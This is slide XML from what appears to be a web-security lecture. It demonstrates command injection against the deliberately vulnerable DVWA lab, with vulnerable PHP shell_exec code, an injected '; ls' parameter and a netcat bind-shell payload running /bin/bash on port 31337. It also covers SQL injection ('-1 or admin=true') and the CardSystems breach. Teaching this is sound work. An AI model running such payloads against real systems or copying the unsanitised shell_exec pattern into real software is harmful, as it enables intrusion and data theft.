              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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05940" y="4256393"/>
            <a:ext cx="2142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PHP exec program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10095" y="0"/>
            <a:ext cx="46533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POST /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dvwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/vulnerabilities/exec/ HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Host: 172.16.59.128</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=127.0.0.1&amp;submit=submit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rounded Rectangular Callout 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6380020" y="533400"/>
            <a:ext cx="1676400" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -184366"/>
              <a:gd name="adj2" fmla="val 45076"/>
              <a:gd name="adj3" fmla="val 16667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 err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Arrow Connector 5"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="9" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6858000" y="2057400"/>
            <a:ext cx="6350" cy="685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72682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13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638800" y="1447800"/>
            <a:ext cx="2438400" cy="6096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Server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98358" y="1447800"/>
            <a:ext cx="2438400" cy="6096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Client</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Elbow Connector 13"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="4487779" y="-992271"/>
            <a:ext cx="12700" cy="4740442"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 1800000"/>
            </a:avLst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2123908" y="2133600"/>
            <a:ext cx="4740442" cy="698847"/>
            <a:chOff x="2123908" y="2965450"/>
            <a:chExt cx="4740442" cy="698847"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="17" name="Elbow Connector 16"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="4487779" y="601579"/>
              <a:ext cx="12700" cy="4740442"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 180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123908" y="3202632"/>
              <a:ext cx="18227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2. Send page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010095" y="0"/>
            <a:ext cx="46533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POST /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dvwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/vulnerabilities/exec/ HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Host: 172.16.59.128</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=127.0.0.1&amp;submit=submit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rounded Rectangular Callout 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6380020" y="533400"/>
            <a:ext cx="1676400" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -184366"/>
              <a:gd name="adj2" fmla="val 45076"/>
              <a:gd name="adj3" fmla="val 16667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 err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Screen Shot 2012-07-02 at 11.54.3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84600"/>
            <a:ext cx="6896100" cy="307340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4343400" y="2743200"/>
            <a:ext cx="4267200" cy="1882525"/>
            <a:chOff x="4343400" y="2743200"/>
            <a:chExt cx="4267200" cy="1882525"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Snip Single Corner Rectangle 14"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4343400" y="2743200"/>
              <a:ext cx="4267200" cy="1476375"/>
            </a:xfrm>
            <a:prstGeom prst="snip1Rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln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r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>  …</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>  $t = $_REQUEST[‘</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1"/>
                <a:t>ip</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>']; </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t> $o = </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1"/>
                <a:t>shell_exec</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>(‘ping –C 3’ . $t);</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t> echo $o</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>  …</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr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405940" y="4256393"/>
              <a:ext cx="21421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PHP exec program</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rounded Rectangular Callout 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1355558" y="3124200"/>
            <a:ext cx="1981200" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 110217"/>
              <a:gd name="adj2" fmla="val -12460"/>
              <a:gd name="adj3" fmla="val 16667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spot the bug</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1374372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14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638800" y="1447800"/>
            <a:ext cx="2438400" cy="6096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Server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98358" y="1447800"/>
            <a:ext cx="2438400" cy="6096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Client</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Elbow Connector 13"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="4487779" y="-992271"/>
            <a:ext cx="12700" cy="4740442"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 1800000"/>
            </a:avLst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2123908" y="2133600"/>
            <a:ext cx="4740442" cy="698847"/>
            <a:chOff x="2123908" y="2965450"/>
            <a:chExt cx="4740442" cy="698847"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="17" name="Elbow Connector 16"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="4487779" y="601579"/>
              <a:ext cx="12700" cy="4740442"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 180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123908" y="3202632"/>
              <a:ext cx="18227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2. Send page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010095" y="0"/>
            <a:ext cx="46533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POST /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dvwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/vulnerabilities/exec/ HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Host: 172.16.59.128</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=127.0.0.1%3b+ls&amp;submit=submit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5943600" y="381000"/>
            <a:ext cx="2438400" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -90686"/>
              <a:gd name="adj2" fmla="val 69036"/>
              <a:gd name="adj3" fmla="val 16667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“; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>” encoded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286000" y="838200"/>
            <a:ext cx="762000" cy="362129"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/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0" y="2662518"/>
            <a:ext cx="6756400" cy="3966881"/>
            <a:chOff x="0" y="2662518"/>
            <a:chExt cx="6756400" cy="3966881"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="11" name="Picture 10" descr="Screen Shot 2012-07-02 at 11.58.34 AM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662518"/>
              <a:ext cx="6756400" cy="3759200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Rounded Rectangular Callout 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2815140" y="5667464"/>
              <a:ext cx="2823660" cy="961935"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRoundRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -94651"/>
                <a:gd name="adj2" fmla="val -27136"/>
                <a:gd name="adj3" fmla="val 16667"/>
              </a:avLst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rtlCol="0" anchor="ctr" anchorCtr="1">
              <a:no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Information</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="2800" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Disclosure</a:t>
              </a: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29882" y="5486400"/>
              <a:ext cx="1494118" cy="714465"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/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rtlCol="0" anchor="ctr" anchorCtr="1">
              <a:no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343400" y="2743200"/>
            <a:ext cx="4267200" cy="1882525"/>
            <a:chOff x="4343400" y="2743200"/>
            <a:chExt cx="4267200" cy="1882525"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="TextBox 21"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5405940" y="4256393"/>
              <a:ext cx="214212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PHP exec program</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Snip Single Corner Rectangle 14"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4343400" y="2743200"/>
              <a:ext cx="4267200" cy="1476375"/>
            </a:xfrm>
            <a:prstGeom prst="snip1Rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln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r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>  …</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>  $t = $_REQUEST[‘</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1"/>
                <a:t>ip</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>']; </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t> $o = </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1"/>
                <a:t>shell_exec</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>(‘ping –C 3’ . $t);</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t> echo $o</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>  …</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="en-US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17779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a Shell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2620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/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> –v –e ‘/bin/bash’ –l –p 31337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876300" y="1828800"/>
            <a:ext cx="7391400" cy="15240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fr-FR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=127.0.0.1+%26+netcat+-v+-e+'/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'+-l+-p+31337&amp;submit=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>submit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4857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Injection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4189" y="1418949"/>
            <a:ext cx="1600200" cy="23042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0021" y="5029200"/>
            <a:ext cx="911250" cy="126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1941128"/>
            <a:ext cx="2182611" cy="1270475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3162300" y="2209800"/>
            <a:ext cx="2819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086600" y="3810000"/>
            <a:ext cx="372595" cy="1143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7715646" y="3429000"/>
            <a:ext cx="209154" cy="1524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3162300" y="2576365"/>
            <a:ext cx="2819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581400" y="1806309"/>
            <a:ext cx="1689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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>user.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=5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65998" y="4234146"/>
            <a:ext cx="3543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SELECT FROM users where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=5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33361" y="3774173"/>
            <a:ext cx="1082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“jburket”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28009" y="2631180"/>
            <a:ext cx="1082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“jburket”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Oval 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3216275" y="1606667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8" name="Oval 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3140075" y="4241947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" name="Oval 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8234557" y="3332455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1" name="Oval 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3478013" y="2673565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4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824256" y="2926933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516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Injection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4189" y="1418949"/>
            <a:ext cx="1600200" cy="23042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0021" y="5029200"/>
            <a:ext cx="911250" cy="126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1941128"/>
            <a:ext cx="2182611" cy="1270475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3162300" y="2209800"/>
            <a:ext cx="2819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086600" y="3810000"/>
            <a:ext cx="372595" cy="1143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7715646" y="3429000"/>
            <a:ext cx="209154" cy="1524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3162300" y="2576365"/>
            <a:ext cx="2819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068709" y="1806309"/>
            <a:ext cx="3380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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>user.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>-1 or admin=true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42085" y="4427674"/>
            <a:ext cx="5235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SELECT FROM users where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>-1 or admin=true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51298" y="3774173"/>
            <a:ext cx="1418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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>adminuser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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28009" y="2631180"/>
            <a:ext cx="1418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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>adminuser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Oval 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2703584" y="1606667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8" name="Oval 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1716162" y="4435475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" name="Oval 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8234557" y="3332455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1" name="Oval 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3478013" y="2673565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4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824256" y="2926933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1341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1400" y="293187"/>
            <a:ext cx="1676400" cy="1052407"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="mc_brand_113_gif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9281" y="1180312"/>
            <a:ext cx="1640639" cy="1029957"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15362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64008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7B763EB4-AB53-445B-A24A-77B4A4F03C31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CardSystems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1536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err="1"/>
              <a:t>CardSystems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credit card payment processing company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SQL injection attack in June 2005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put out of business</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pP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The Attack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263,000 credit card #s stolen from database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credit card #s stored unencrypted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43 million credit card #s exposed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pP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6400800"/>
            <a:ext cx="5910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Image: http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>usa.visa.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>/merchants/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>marketing_center</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>logo_usage.html</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>              https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>www.mastercardbrandcenter.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400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5627358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Primer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A05C-7D88-9E4B-B6AC-1CE35ACF5DD7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616538"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4099859" y="1380565"/>
          <a:ext cx="4236130" cy="138176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452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1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1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Column 1 </a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" dirty="0"/>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>of Type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Column 2 </a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" dirty="0"/>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>of Type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Column 3 </a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" dirty="0"/>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>of Type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  <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty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98747"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="914400" y="4302760"/>
          <a:ext cx="7772402" cy="18542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97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4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46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46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46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09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user_id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first_name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last_name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password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avatar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&lt;hash 1&gt;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admin.jpg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Gordon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gordonb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&lt;hash</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0"/>
                        <a:t> 2&gt;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gordonb.jpg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&lt;hash 3&gt;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hacker.jpg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0" y="6172200"/>
            <a:ext cx="914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‘users’ table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28600" y="1143000"/>
            <a:ext cx="3733800" cy="21336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1"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A table is defined by a tuple (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" baseline="-25000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" baseline="-25000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, ..., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" baseline="-25000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>of typed named values. Each row is a tuple of values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i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(v</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" baseline="-25000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" baseline="-25000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
